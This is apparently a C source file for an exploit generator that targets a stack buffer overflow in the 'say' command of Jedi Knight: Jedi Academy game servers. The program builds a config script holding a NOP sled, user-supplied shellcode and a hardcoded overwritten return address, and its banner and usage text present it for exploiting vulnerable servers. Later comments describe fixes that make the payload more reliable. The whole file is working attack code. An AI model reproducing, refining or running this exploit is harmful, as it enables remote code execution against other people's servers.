- /*
- * jk3saybof copyright 2009 [lc]lamerlord
- *
- * This program is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program. If not, see <http://www.gnu.org/licenses/>.
- **/
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Byte offset (combined with namelen in main) of the saved return address in
 * the overflowed frame: main writes NEWRET at RETOFFSETT + namelen - 8. */
#define RETOFFSETT 1004
/* Maximum number of raw shellcode bytes loadBin accepts; also sizeof code[]. */
#define CODESIZE 1000
/* Value written over the saved return address. The banner in main says it is
 * an instruction that jumps back into the overflowed buffer; which binary or
 * version the address belongs to is not recorded here, so verify before use. */
#define NEWRET 0x7c873c53
/* Raw shellcode bytes loaded by loadBin; bytes past codesize are zero-filled. */
char code[CODESIZE];
/* Number of valid bytes in code[], set by loadBin. */
int codesize;
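/*
 * Return the size in bytes of the stream fp, measured by seeking to its end,
 * and rewind the stream to its first byte so the caller can fread from it.
 *
 * fp: an open stream; must be seekable (a regular file, not a pipe or tty).
 *
 * Returns -1 if fp is NULL, if either fseek fails, if ftell fails, or if the
 * size does not fit in an int (the return type is kept as int for loadBin).
 * Callers must reject a negative result before using it as a read length:
 * passed to fread as size_t it would become a huge count.
 */
int getFileSize(FILE *fp)
{
    long size;

    if (fp == NULL || fseek(fp, 0, SEEK_END) != 0)
        return -1;
    size = ftell(fp);
    if (size < 0)
        return -1;
    /* Rewind; on failure the position is unknown, so report an error. */
    if (fseek(fp, 0, SEEK_SET) != 0)
        return -1;
    /* Avoid silent truncation when narrowing long -> int. */
    if (size > INT_MAX)
        return -1;
    return (int)size;
}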
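/*
 * Load a raw binary shellcode file into the global code[] buffer.
 *
 * fileName: path of the file holding the raw shellcode bytes.
 *
 * On success codesize holds the number of bytes loaded, the rest of code[]
 * is zero-filled and 1 is returned. On failure (cannot open, size unknown,
 * larger than CODESIZE, short read) a message is printed, code[] is zeroed,
 * codesize stays 0 and 0 is returned.
 *
 * The file is opened in binary mode: shellcode is arbitrary bytes, and text
 * mode on Windows would translate line endings and stop at a 0x1A byte.
 * Fixes versus the original: "rb" instead of "r", a negative getFileSize
 * result is rejected instead of being passed to fread as a huge size_t,
 * the stream is closed on the too-large path (it leaked), and fread's
 * return value is checked.
 */
int loadBin(char *fileName)
{
    FILE *fp;
    int size;
    size_t got;

    codesize = 0;
    fp = fopen(fileName, "rb");
    if (fp == NULL)
    {
        printf("cannot open the file\n");
        return 0;
    }
    size = getFileSize(fp);
    if (size < 0)
    {
        printf("cannot determine the size of the file\n");
        fclose(fp);
        return 0;
    }
    printf("Size of shellcode : %d Bytes\n", size);
    if (size > CODESIZE)
    {
        printf("Binary shellcode too large\n");
        fclose(fp);
        return 0;
    }
    memset(code, 0x00, CODESIZE);
    got = fread(code, 1, (size_t)size, fp);
    fclose(fp);
    if (got != (size_t)size)
    {
        printf("short read: got %lu of %d bytes\n", (unsigned long)got, size);
        memset(code, 0x00, CODESIZE);
        return 0;
    }
    codesize = size;
    return 1;
}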
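/* Store a 32-bit value at p as four little-endian bytes. The target is an x86
 * server, so the byte order must not depend on the host; the original wrote
 * the int through an (int *) cast into a char array (misaligned, host order). */
static void put_le32(unsigned char *p, unsigned int v)
{
    p[0] = (unsigned char)(v & 0xffu);
    p[1] = (unsigned char)((v >> 8) & 0xffu);
    p[2] = (unsigned char)((v >> 16) & 0xffu);
    p[3] = (unsigned char)((v >> 24) & 0xffu);
}

/*
 * Entry point: write a JK3 .cfg script whose single "say" command carries the
 * overflowing string.
 *
 * argv[1]: raw binary shellcode file (loaded into code[] by loadBin).
 * argv[2]: output .cfg path.
 *
 * Payload layout inside the 1024-byte buffer, with
 * retpos = RETOFFSETT + namelen - 8 = 1003:
 *   [0, retpos - codesize)        0x90 NOP sled
 *   [retpos - codesize, retpos)   the shellcode, ending right before the
 *                                 saved return address slot
 *   [retpos, retpos + 4)          NEWRET, little-endian
 *   retpos + 4                    NUL terminator for the %s below
 * Because codesize <= CODESIZE (1000), the shellcode never starts below
 * offset 3 and the NUL lands at 1007, inside the buffer.
 *
 * Returns 0 on success and 1 on usage error or any failure (the original
 * returned 0 on every path, so a caller could not tell success from failure).
 * Also fixed: the two error messages named the wrong argv entry, and the
 * output is opened in binary mode so shellcode bytes reach the file unchanged.
 */
int main(int argc, char **argv)
{
    FILE *cfgfile;
    unsigned int newRet;
    unsigned char buffer[1024];
    int namelen = 7;
    int retpos;
    int codepos;
    int j;

    printf("********************************************************\n");
    printf("< # ## >[lc]lamerlords JK3 cfg script maker\n");
    printf("< # # >For use in exploitation of voulnerable\n");
    printf("< ##lamer ##clan >Jedi knight Jedi Academy servers\n");
    printf("********************************************************\n\n");
    printf("This program makes a script that can be executed\n");
    printf("from the client game console that will give the server\n");
    printf("a too big string throug the /say command and the stack buffer \n");
    printf("overflows, and the return adress is overwritten to point at an instruction\n");
    printf("that jumps to the start of the local buffer we just overflowed,\n");
    printf("witch has been filled with user specified shellcode in raw binary format.\n\n");
    printf("Check http://aluigi.org/adv/jamsgbof-adv.txt for info about this voulnerability\n\n\n");

    newRet = NEWRET;
    if (argc < 3)
    {
        printf("Usage: crashconf <SHELLCODE> <OUTPUT>\n");
        printf("---SHELLCODE is a raw binary shellcode\n");
        printf("---OUTPUT.cfg is a text file u need to put in gamedata/base/ \n");
        printf("---Type /exec OUTPUT.cfg in JK3 console to test the exploit\n\n");
        return 1;
    }

    /* Load the raw shellcode from a binary file into code[] / codesize. */
    if (loadBin(argv[1]) == 0)
    {
        printf("error while loading raw shellcode file: %s \n", argv[1]);
        printf(" Press any key to exit\n");
        return 1;
    }

    /* The payload travels as a C string inside a quoted console command: a
     * NUL byte ends the %s early, and a double quote or a line break ends the
     * quoted argument or the command line in the .cfg. Warn rather than abort
     * so the user can pick a suitably encoded shellcode. */
    for (j = 0; j < codesize; j++)
    {
        unsigned char b = (unsigned char)code[j];
        if (b == 0x00 || b == '"' || b == '\n' || b == '\r')
        {
            printf("warning: shellcode byte %d is 0x%02x and will likely break the say string\n", j, b);
        }
    }

    /* Open the text file to put the game command in. Binary mode so that a
     * 0x0A in the shellcode is not expanded to CRLF on Windows. */
    cfgfile = fopen(argv[2], "wb");
    if (cfgfile == NULL)
    {
        printf("couldnt open JK3 config file: %s \n", argv[2]);
        return 1;
    }

    retpos = RETOFFSETT + namelen - 8;
    codepos = retpos - codesize;

    memset(buffer, 0x90, sizeof buffer);
    memcpy(buffer + codepos, code, (size_t)codesize);
    printf("Printing %d bytes of code\n", codesize);
    put_le32(buffer + retpos, newRet);
    buffer[retpos + 4] = 0;
    printf("Printing adress: 0x%x over the return adress\n", newRet);

    /* Write the overflowing string; fclose flushes, so check it too. */
    if (fprintf(cfgfile, "say \"%s\"", (char *)buffer) < 0 || fclose(cfgfile) != 0)
    {
        printf("error writing JK3 config file: %s \n", argv[2]);
        return 1;
    }
    return 0;
}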